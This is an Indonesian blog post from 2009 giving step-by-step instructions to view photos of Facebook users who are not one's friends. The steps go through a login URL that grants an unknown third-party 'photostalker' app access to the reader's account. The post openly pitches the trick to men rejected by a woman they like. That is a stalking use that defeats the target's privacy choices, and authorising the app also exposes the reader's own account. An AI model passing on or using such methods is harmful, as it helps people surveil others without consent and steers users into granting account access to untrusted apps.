Jumat, 20 November 2009

Mengintip Foto Orang Lain Di Facebook....

Pernahkah kita kebingungan mencari tahu siapakah teman yang baru saja melakukan permintaan pertemanan kepada kita di Facebook tanpa kita bisa melihat wajah dalam kumpulan foto yang ia miliki ? Nah untuk melanjutkan Tutorial cara membuat Facebook, maka Achiles kali ini akan memberikan Tips trik dan cara melihat foto orang lain yang belum termasuk dalam daftar teman facebook kita. Tips cara mengintip foto orang lain ini tidak bertujuan untuk hal yang jahat namun sebaliknya, kita bisa menghindari hal2 jahat yang akan menimpa kita jika kita secara sembarangan melakukan konfirmasi pertemanan yang belum kita tahu foto dan profil mereka sebelumnya. Tips mengintip ini juga bisa jadi sarana kangen untuk para cowok2 yang seringkali ditolak permintaan pertemanannya oleh gadis pujaan hatinya :D . Namun sekali lagi Cara melihat atau mengintip Foto Facebook orang lain ini jangan disalah gunakan untuk hal2 yang jahat. Ok deh berikut Tips dan trik nya.

1. Silahkan Login menggunakan acount facebook anda

2. Copy Paste Code berikut ke Browser Anda

http://www.facebook.com/login.php?api_key=63b7a5b8175cf509044b63af282108b4&v=1.0&next=http%3A%2F%2Fphotostalker.viewprivatefacebookpictures.com%2F&canvas=1&_fb_q=1

3. Setelah anda masuk ke url diatas, maka akan terlihat tampilan seperti dibawah ini

4. Klik “Allow” jika anda setuju dengan ketentuan dan kebijakan tersebut

5. Kemudia akan muncul tampilan seperti gambar dibawah ini




6. Cari alamat Facebook yang hendak anda lihat atau intip foto nya, dan pastekan ID, URL atau Nama Facebook yang akan anda tuju itu tepat pada kolom yang diwarnai merah yang terlihat pada gambar diatas.

sumber : achiles-punyablog

Tidak ada komentar:

Posting Komentar